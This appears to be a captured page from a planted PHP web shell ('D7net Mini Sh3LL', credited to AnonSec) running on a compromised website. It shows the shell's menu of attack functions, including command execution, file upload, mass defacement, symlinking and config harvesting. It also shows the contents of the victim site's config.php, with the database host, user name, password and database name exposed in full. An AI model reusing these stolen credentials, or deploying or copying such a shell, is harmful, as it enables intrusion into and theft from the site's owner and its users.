D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/lib/../conn/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/lib/../conn/config.php
<?php
define("DBHOST","localhost");
define("DBUSER","tinson");
define("DBPASS","_rx407nU");
define("DBNAME","nhmayqyx_tinson");
$errors=array();
$notice="";
session_start();
class food{
	function food($name,$price,$status,$image,$discount){
		$this->name = $name;
		$this->price = $price;
		$this->status = $status;
		$this->image = $image;	
		$this->discount = $discount;	
	}
	
}
class news{
	function news($name,$image,$code,$content,$dateCreate){
		$this->name = $name;
		$this->image = $image;
		$this->code = $code;
		$this->content = $content;
		$this->dateCreate = $dateCreate;
	}
	
}
?>

AnonSec - 2021 | Recode By D7net